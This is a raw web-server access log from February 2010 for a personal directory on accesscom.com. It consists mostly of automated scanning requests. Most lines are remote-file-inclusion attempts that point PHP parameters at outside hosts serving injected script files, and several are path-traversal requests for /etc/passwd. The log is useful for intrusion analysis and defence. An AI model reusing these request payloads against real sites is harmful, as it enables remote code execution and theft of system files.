189.6.218.57 - - [02/Feb/2010:01:12:46 -0800] "GET /~daveh/logs/solpot.html?body=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 303 /home/users/d/daveh/public_html/logs/solpot.html "-" "Mozilla/5.0" 0 www.accesscom.com
189.6.218.57 - - [02/Feb/2010:01:12:46 -0800] "GET /~daveh/logs/access.log/solpot.html?body=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 314 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
79.98.23.9 - - [02/Feb/2010:01:13:18 -0800] "GET /~daveh/logs/access.log////skin/ggambo7002_board/comment_modify.php?dir=http://www.manpoints.net/ei/11.txt???? HTTP/1.1" 404 346 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
79.98.23.9 - - [02/Feb/2010:01:13:18 -0800] "GET /~daveh/logs////skin/ggambo7002_board/comment_modify.php?dir=http://www.manpoints.net/ei/11.txt???? HTTP/1.1" 404 335 /home/users/d/daveh/public_html/logs////skin "-" "Mozilla/5.0" 0 www.accesscom.com
79.98.23.9 - - [02/Feb/2010:01:13:18 -0800] "GET /~daveh////skin/ggambo7002_board/comment_modify.php?dir=http://www.manpoints.net/ei/11.txt???? HTTP/1.1" 404 330 /home/users/d/daveh/public_html/skin "-" "Mozilla/5.0" 0 www.accesscom.com
189.26.124.26 - - [02/Feb/2010:01:13:25 -0800] "GET /~daveh/solpot.html?body=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 298 /home/users/d/daveh/public_html/solpot.html "-" "Mozilla/5.0" 0 www.accesscom.com
189.26.124.26 - - [02/Feb/2010:01:13:25 -0800] "GET /~daveh/logs/access.log/solpot.html?body=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 314 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
189.26.124.26 - - [02/Feb/2010:01:13:25 -0800] "GET /~daveh/logs/solpot.html?body=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 303 /home/users/d/daveh/public_html/logs/solpot.html "-" "Mozilla/5.0" 0 www.accesscom.com
219.94.194.248 - - [02/Feb/2010:01:13:33 -0800] "GET /~daveh////skin/ggambo7002_board/comment_modify.php?dir=http://www.infocleaner.com/bbs///skin/ggambo7002_board/sc1? HTTP/1.1" 404 330 /home/users/d/daveh/public_html/skin "-" "Mozilla/5.0" 0 www.accesscom.com
219.94.194.248 - - [02/Feb/2010:01:13:33 -0800] "GET /~daveh/logs/access.log////skin/ggambo7002_board/comment_modify.php?dir=http://www.infocleaner.com/bbs///skin/ggambo7002_board/sc1? HTTP/1.1" 404 346 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
219.94.194.248 - - [02/Feb/2010:01:13:33 -0800] "GET /~daveh/logs////skin/ggambo7002_board/comment_modify.php?dir=http://www.infocleaner.com/bbs///skin/ggambo7002_board/sc1? HTTP/1.1" 404 335 /home/users/d/daveh/public_html/logs////skin "-" "Mozilla/5.0" 0 www.accesscom.com
74.208.77.123 - - [02/Feb/2010:01:14:41 -0800] "GET /~daveh/logs/access.log%20%20/?_SERVER[DOCUMENT_ROOT]=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 305 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
74.208.77.123 - - [02/Feb/2010:01:14:41 -0800] "GET /~daveh/?_SERVER[DOCUMENT_ROOT]=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 200 2787 /home/users/d/daveh/public_html/ "-" "Mozilla/5.0" 0 www.accesscom.com
74.208.77.123 - - [02/Feb/2010:01:14:41 -0800] "GET /~daveh/logs/?_SERVER[DOCUMENT_ROOT]=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 200 13158 /home/users/d/daveh/public_html/logs/ "-" "Mozilla/5.0" 0 www.accesscom.com
201.36.173.93 - - [02/Feb/2010:01:14:56 -0800] "GET /~daveh/solpot.html?body=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 298 /home/users/d/daveh/public_html/solpot.html "-" "Mozilla/5.0" 0 www.accesscom.com
201.36.173.93 - - [02/Feb/2010:01:14:56 -0800] "GET /~daveh/logs/solpot.html?body=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 303 /home/users/d/daveh/public_html/logs/solpot.html "-" "Mozilla/5.0" 0 www.accesscom.com
201.36.173.93 - - [02/Feb/2010:01:14:56 -0800] "GET /~daveh/logs/access.log/solpot.html?body=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 314 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
219.94.194.248 - - [02/Feb/2010:01:18:23 -0800] "GET /~daveh////skin/ggambo7002_board/comment_modify.php?dir=http://www.infocleaner.com/bbs///skin/ggambo7002_board/sc1? HTTP/1.1" 404 330 /home/users/d/daveh/public_html/skin "-" "Mozilla/5.0" 0 www.accesscom.com
219.94.194.248 - - [02/Feb/2010:01:18:23 -0800] "GET /~daveh/logs/access.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://www.infocleaner.com/bbs///skin/ggambo7002_board/sc1? HTTP/1.1" 404 348 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
219.94.194.248 - - [02/Feb/2010:01:18:23 -0800] "GET /~daveh/logs////skin/ggambo7002_board/comment_modify.php?dir=http://www.infocleaner.com/bbs///skin/ggambo7002_board/sc1? HTTP/1.1" 404 335 /home/users/d/daveh/public_html/logs////skin "-" "Mozilla/5.0" 0 www.accesscom.com
200.207.8.238 - - [02/Feb/2010:01:20:06 -0800] "GET /~daveh//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 298 /home/users/d/daveh/public_html/kboard.php "-" "Mozilla/5.0" 0 www.accesscom.com
200.207.8.238 - - [02/Feb/2010:01:20:06 -0800] "GET /~daveh/logs/access.log%20%20//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 316 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
200.207.8.238 - - [02/Feb/2010:01:20:06 -0800] "GET /~daveh/logs//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 303 /home/users/d/daveh/public_html/logs//kboard.php "-" "Mozilla/5.0" 0 www.accesscom.com
79.98.23.9 - - [02/Feb/2010:01:21:03 -0800] "GET /~daveh/logs////skin/ggambo7002_board/comment_modify.php?dir=http://www.manpoints.net/ei/11.txt???? HTTP/1.1" 404 335 /home/users/d/daveh/public_html/logs////skin "-" "Mozilla/5.0" 0 www.accesscom.com
79.98.23.9 - - [02/Feb/2010:01:21:03 -0800] "GET /~daveh////skin/ggambo7002_board/comment_modify.php?dir=http://www.manpoints.net/ei/11.txt???? HTTP/1.1" 404 330 /home/users/d/daveh/public_html/skin "-" "Mozilla/5.0" 0 www.accesscom.com
79.98.23.9 - - [02/Feb/2010:01:21:03 -0800] "GET /~daveh/logs/access.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://www.manpoints.net/ei/11.txt???? HTTP/1.1" 404 348 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
65.55.106.139 - - [02/Feb/2010:01:22:32 -0800] "GET /~daveh/case/?N=D HTTP/1.1" 200 1925 /home/users/d/daveh/public_html/case/ "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" 0 www.accesscom.com
210.114.174.53 - - [02/Feb/2010:01:23:42 -0800] "GET /~daveh//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.usher.co.kr/data/id/one.txt??? HTTP/1.1" 404 342 /home/users/d/daveh/public_html/skin_shop "-" "Mozilla/5.0" 0 www.accesscom.com
210.114.174.53 - - [02/Feb/2010:01:23:42 -0800] "GET /~daveh/logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.usher.co.kr/data/id/one.txt??? HTTP/1.1" 404 347 /home/users/d/daveh/public_html/logs//skin_shop "-" "Mozilla/5.0" 0 www.accesscom.com
210.114.174.53 - - [02/Feb/2010:01:23:42 -0800] "GET /~daveh/logs/access.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.usher.co.kr/data/id/one.txt??? HTTP/1.1" 404 358 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
210.114.174.53 - - [02/Feb/2010:01:23:47 -0800] "GET /~daveh/logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.usher.co.kr/data/id/one.txt??? HTTP/1.1" 404 347 /home/users/d/daveh/public_html/logs//skin_shop "-" "Mozilla/5.0" 0 www.accesscom.com
210.114.174.53 - - [02/Feb/2010:01:23:47 -0800] "GET /~daveh/logs/access.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.usher.co.kr/data/id/one.txt??? HTTP/1.1" 404 358 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
210.114.174.53 - - [02/Feb/2010:01:23:52 -0800] "GET /~daveh//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.usher.co.kr/data/id/one.txt??? HTTP/1.1" 404 342 /home/users/d/daveh/public_html/skin_shop "-" "Mozilla/5.0" 0 www.accesscom.com
200.207.8.238 - - [02/Feb/2010:01:28:10 -0800] "GET /~daveh/logs/access.log//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 314 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
201.36.173.93 - - [02/Feb/2010:01:35:10 -0800] "GET /~daveh//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 298 /home/users/d/daveh/public_html/kboard.php "-" "Mozilla/5.0" 0 www.accesscom.com
201.36.173.93 - - [02/Feb/2010:01:35:10 -0800] "GET /~daveh/logs//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 303 /home/users/d/daveh/public_html/logs//kboard.php "-" "Mozilla/5.0" 0 www.accesscom.com /home/users/d/daveh/public_html/logs/access.log
201.36.173.93 - - [02/Feb/2010:01:35:10 -0800] "GET /~daveh/logs/access.log%20%20//kboard.php?board=sightseeing&ci
84.40.23.86 - - [02/Feb/2010:01:37:05 -0800] "GET /~daveh///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.socialworkleadership.org/sw/leadership/reports/id/id1.txt?? HTTP/1.1" 404 339 /home/users/d/daveh/public_html/components "-" "Mozilla/5.0" 0 www.accesscom.com
84.40.23.86 - - [02/Feb/2010:01:37:05 -0800] "GET /~daveh/logs/access.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.socialworkleadership.org/sw/leadership/reports/id/id1.txt?? HTTP/1.1" 404 355 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
84.40.23.86 - - [02/Feb/2010:01:37:05 -0800] "GET /~daveh/logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.socialworkleadership.org/sw/leadership/reports/id/id1.txt?? HTTP/1.1" 404 344 /home/users/d/daveh/public_html/logs///components "-" "Mozilla/5.0" 0 www.accesscom.com
65.55.207.74 - - [02/Feb/2010:01:37:32 -0800] "GET /%7Edaveh/sean/song/songskit.html HTTP/1.1" 304 - /home/users/d/daveh/public_html/sean/song/songskit.html "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" 0 www.accesscom.com
84.40.23.86 - - [02/Feb/2010:01:41:26 -0800] "GET /~daveh/logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.socialworkleadership.org/sw/leadership/reports/id/id1.txt?? HTTP/1.1" 404 344 /home/users/d/daveh/public_html/logs///components "-" "Mozilla/5.0" 0 www.accesscom.com
84.40.23.86 - - [02/Feb/2010:01:41:26 -0800] "GET /~daveh/logs/access.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.socialworkleadership.org/sw/leadership/reports/id/id1.txt?? HTTP/1.1" 404 357 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
84.40.23.86 - - [02/Feb/2010:01:41:26 -0800] "GET /~daveh///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.socialworkleadership.org/sw/leadership/reports/id/id1.txt?? HTTP/1.1" 404 339 /home/users/d/daveh/public_html/components "-" "Mozilla/5.0" 0 www.accesscom.com
84.40.23.86 - - [02/Feb/2010:01:41:33 -0800] "GET /~daveh///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.socialworkleadership.org/sw/leadership/reports/id/id1.txt?? HTTP/1.1" 404 339 /home/users/d/daveh/public_html/components "-" "Mozilla/5.0" 0 www.accesscom.com
84.40.23.86 - - [02/Feb/2010:01:41:33 -0800] "GET /~daveh/logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.socialworkleadership.org/sw/leadership/reports/id/id1.txt?? HTTP/1.1" 404 344 /home/users/d/daveh/public_html/logs///components "-" "Mozilla/5.0" 0 www.accesscom.com
84.40.23.86 - - [02/Feb/2010:01:41:33 -0800] "GET /~daveh/logs/access.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.socialworkleadership.org/sw/leadership/reports/id/id1.txt?? HTTP/1.1" 404 357 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
84.19.168.8 - - [02/Feb/2010:01:45:03 -0800] "GET /~daveh//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.sarpifirenze.it/media/id1.txt??? HTTP/1.1" 404 359 /home/users/d/daveh/public_html/administrator "-" "Mozilla/5.0" 0 www.accesscom.com
84.19.168.8 - - [02/Feb/2010:01:45:04 -0800] "GET /~daveh/logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.sarpifirenze.it/media/id1.txt??? HTTP/1.1" 404 364 /home/users/d/daveh/public_html/logs//administrator "-" "Mozilla/5.0" 0 www.accesscom.com
84.19.168.8 - - [02/Feb/2010:01:45:04 -0800] "GET /~daveh/logs/access.log%20%20//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.sarpifirenze.it/media/id1.txt??? HTTP/1.1" 404 377 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
84.19.168.8 - - [02/Feb/2010:01:49:08 -0800] "GET /~daveh/logs/access.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.sarpifirenze.it/media/id1.txt??? HTTP/1.1" 404 375 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
84.19.168.8 - - [02/Feb/2010:01:49:09 -0800] "GET /~daveh/logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.sarpifirenze.it/media/id1.txt??? HTTP/1.1" 404 364 /home/users/d/daveh/public_html/logs//administrator "-" "Mozilla/5.0" 0 www.accesscom.com
84.19.168.8 - - [02/Feb/2010:01:49:09 -0800] "GET /~daveh//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.sarpifirenze.it/media/id1.txt??? HTTP/1.1" 404 359 /home/users/d/daveh/public_html/administrator "-" "Mozilla/5.0" 0 www.accesscom.com
201.36.173.93 - - [02/Feb/2010:01:49:34 -0800] "GET /~daveh/logs/access.log//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 314 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
189.6.218.57 - - [02/Feb/2010:01:50:57 -0800] "GET /~daveh//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 298 /home/users/d/daveh/public_html/kboard.php "-" "Mozilla/5.0" 0 www.accesscom.com
189.6.218.57 - - [02/Feb/2010:01:50:57 -0800] "GET /~daveh/logs//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 303 /home/users/d/daveh/public_html/logs//kboard.php "-" "Mozilla/5.0" 0 www.accesscom.com
189.6.218.57 - - [02/Feb/2010:01:50:57 -0800] "GET /~daveh/logs/access.log%20%20//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 316 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
189.6.218.57 - - [02/Feb/2010:01:54:16 -0800] "GET /~daveh////skin/ggambo7002_board/comment_modify.php?dir=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 330 /home/users/d/daveh/public_html/skin "-" "Mozilla/5.0" 0 www.accesscom.com
189.6.218.57 - - [02/Feb/2010:01:54:16 -0800] "GET /~daveh/logs////skin/ggambo7002_board/comment_modify.php?dir=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 335 /home/users/d/daveh/public_html/logs////skin "-" "Mozilla/5.0" 0 www.accesscom.com
189.6.218.57 - - [02/Feb/2010:01:54:16 -0800] "GET /~daveh/logs/access.log////skin/ggambo7002_board/comment_modify.php?dir=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 346 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
189.6.218.57 - - [02/Feb/2010:01:58:27 -0800] "GET /~daveh/logs/access.log//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 314 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
196.35.158.178 - - [02/Feb/2010:02:01:49 -0800] "GET /~daveh////bbs//delete_comment.php?board_skin_path=http://www.budeko.pl/language/one.txt? HTTP/1.1" 404 313 /home/users/d/daveh/public_html/bbs "-" "Mozilla/5.0" 0 www.accesscom.com
196.35.158.178 - - [02/Feb/2010:02:01:49 -0800] "GET /~daveh/logs/access.log////bbs//delete_comment.php?board_skin_path=http://www.budeko.pl/language/one.txt? HTTP/1.1" 404 329 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
196.35.158.178 - - [02/Feb/2010:02:01:49 -0800] "GET /~daveh/logs////bbs//delete_comment.php?board_skin_path=http://www.budeko.pl/language/one.txt? HTTP/1.1" 404 318 /home/users/d/daveh/public_html/logs////bbs "-" "Mozilla/5.0" 0 www.accesscom.com
59.188.106.242 - - [02/Feb/2010:02:05:39 -0800] "GET /~daveh/sean/song/pbsong4.html HTTP/1.1" 200 59712 /home/users/d/daveh/public_html/sean/song/pbsong4.html "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1) Gecko/20061010 Firefox/2.0" 1 www.accesscom.com
66.235.124.14 - - [02/Feb/2010:02:07:04 -0800] "GET /%7Edaveh/sean/song/songskit.html HTTP/1.1" 200 51136 /home/users/d/daveh/public_html/sean/song/songskit.html "-" "Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)" 1 www.accesscom.com
200.207.8.238 - - [02/Feb/2010:02:08:46 -0800] "GET /~daveh////skin/ggambo7002_board/comment_modify.php?dir=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 330 /home/users/d/daveh/public_html/skin "-" "Mozilla/5.0" 0 www.accesscom.com
200.207.8.238 - - [02/Feb/2010:02:08:46 -0800] "GET /~daveh/logs/access.log////skin/ggambo7002_board/comment_modify.php?dir=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 346 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
200.207.8.238 - - [02/Feb/2010:02:08:46 -0800] "GET /~daveh/logs////skin/ggambo7002_board/comment_modify.php?dir=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 335 /home/users/d/daveh/public_html/logs////skin "-" "Mozilla/5.0" 0 www.accesscom.com
221.139.0.75 - - [02/Feb/2010:02:15:27 -0800] "GET /~daveh/logs/access.log/view.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 311 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
221.139.0.75 - - [02/Feb/2010:02:15:27 -0800] "GET /~daveh/logs/view.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 300 /home/users/d/daveh/public_html/logs/view.php "-" "Mozilla/5.0" 0 www.accesscom.com
221.139.0.75 - - [02/Feb/2010:02:15:27 -0800] "GET /~daveh/view.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 295 /home/users/d/daveh/public_html/view.php "-" "Mozilla/5.0" 0 www.accesscom.com
220.80.108.81 - - [02/Feb/2010:02:15:52 -0800] "GET /~daveh/logs/access.log/setup.php?dir=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 312 /home/users/d/daveh/public_html/logs/access.log "-" "libwww-perl/5.833" 0 www.accesscom.com
220.80.108.81 - - [02/Feb/2010:02:15:53 -0800] "GET /~daveh/logs/setup.php?dir=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 301 /home/users/d/daveh/public_html/logs/setup.php "-" "libwww-perl/5.833" 0 www.accesscom.com
220.80.108.81 - - [02/Feb/2010:02:16:04 -0800] "GET /~daveh/logs/access.log/setup.php?dir=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 312 /home/users/d/daveh/public_html/logs/access.log "-" "libwww-perl/5.833" 0 www.accesscom.com
220.80.108.81 - - [02/Feb/2010:02:16:04 -0800] "GET /~daveh/logs/setup.php?dir=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 301 /home/users/d/daveh/public_html/logs/setup.php "-" "libwww-perl/5.833" 0 www.accesscom.com
216.119.103.12 - - [02/Feb/2010:02:29:35 -0800] "GET /~daveh/index.php?option=com_virtuemart&Itemid=&mosConfig_absolute_path=http://www.villantomagazin.com//1.txt?? HTTP/1.1" 404 296 /home/users/d/daveh/public_html/index.php "-" "Mozilla/5.0" 0 www.accesscom.com
216.119.103.12 - - [02/Feb/2010:02:29:45 -0800] "GET /~daveh/logs/index.php?option=com_virtuemart&Itemid=&mosConfig_absolute_path=http://www.villantomagazin.com//1.txt?? HTTP/1.1" 404 301 /home/users/d/daveh/public_html/logs/index.php "-" "Mozilla/5.0" 0 www.accesscom.com
216.119.103.12 - - [02/Feb/2010:02:29:45 -0800] "GET /~daveh/logs/access.log/index.php?option=com_virtuemart&Itemid=&mosConfig_absolute_path=http://www.villantomagazin.com//1.txt?? HTTP/1.1" 404 312 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
193.19.177.19 - - [02/Feb/2010:02:41:43 -0800] "GET /~daveh/logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.havana-da.de/images/iid1.txt?? HTTP/1.1" 404 354 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
193.19.177.19 - - [02/Feb/2010:02:41:43 -0800] "GET /~daveh//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.havana-da.de/images/iid1.txt?? HTTP/1.1" 404 338 /home/users/d/daveh/public_html/administrator "-" "Mozilla/5.0" 0 www.accesscom.com
193.19.177.19 - - [02/Feb/2010:02:41:43 -0800] "GET /~daveh/logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.havana-da.de/images/iid1.txt?? HTTP/1.1" 404 343 /home/users/d/daveh/public_html/logs//administrator "-" "Mozilla/5.0" 0 www.accesscom.com
174.37.162.130 - - [02/Feb/2010:02:42:17 -0800] "GET /~daveh/logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 342 /home/users/d/daveh/public_html/logs/components "-" "Mozilla/5.0" 0 www.accesscom.com
174.37.162.130 - - [02/Feb/2010:02:42:17 -0800] "GET /~daveh/logs/access.log/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 353 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
174.37.162.130 - - [02/Feb/2010:02:42:17 -0800] "GET /~daveh/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 337 /home/users/d/daveh/public_html/components "-" "Mozilla/5.0" 0 www.accesscom.com
174.37.162.130 - - [02/Feb/2010:02:42:20 -0800] "GET /~daveh/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 337 /home/users/d/daveh/public_html/components "-" "Mozilla/5.0" 0 www.accesscom.com
174.37.162.130 - - [02/Feb/2010:02:42:20 -0800] "GET /~daveh/logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 342 /home/users/d/daveh/public_html/logs/components "-" "Mozilla/5.0" 0 www.accesscom.com
174.37.162.130 - - [02/Feb/2010:02:42:20 -0800] "GET /~daveh/logs/access.log/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 353 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
174.37.162.130 - - [02/Feb/2010:02:42:22 -0800] "GET /~daveh/logs/access.log/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 353 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
174.37.162.130 - - [02/Feb/2010:02:42:22 -0800] "GET /~daveh/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 337 /home/users/d/daveh/public_html/components "-" "Mozilla/5.0" 0 www.accesscom.com
174.37.162.130 - - [02/Feb/2010:02:42:22 -0800] "GET /~daveh/logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 342 /home/users/d/daveh/public_html/logs/components "-" "Mozilla/5.0" 0 www.accesscom.com
174.37.162.130 - - [02/Feb/2010:02:42:22 -0800] "GET /~daveh/logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 342 /home/users/d/daveh/public_html/logs/components "-" "Mozilla/5.0" 0 www.accesscom.com
174.37.162.130 - - [02/Feb/2010:02:42:22 -0800] "GET /~daveh/logs/access.log/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 353 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
174.37.162.130 - - [02/Feb/2010:02:42:22 -0800] "GET /~daveh/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 337 /home/users/d/daveh/public_html/components "-" "Mozilla/5.0" 0 www.accesscom.com
207.218.200.0 - - [02/Feb/2010:02:42:57 -0800] "GET /~daveh//appserv/main.php?appserv_root=http://www.hanchungyo.com/cgi/files/mainbanner/1.jpg? HTTP/1.1" 404 304 /home/users/d/daveh/public_html/appserv "-" "Mozilla/5.0" 0 www.accesscom.com
207.218.200.0 - - [02/Feb/2010:02:42:57 -0800] "GET /~daveh/logs//appserv/main.php?appserv_root=http://www.hanchungyo.com/cgi/files/mainbanner/1.jpg? HTTP/1.1" 404 309 /home/users/d/daveh/public_html/logs//appserv "-" "Mozilla/5.0" 0 www.accesscom.com
207.218.200.0 - - [02/Feb/2010:02:42:57 -0800] "GET /~daveh/logs/access.log%20%20//appserv/main.php?appserv_root=http://www.hanchungyo.com/cgi/files/mainbanner/1.jpg? HTTP/1.1" 404 322 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
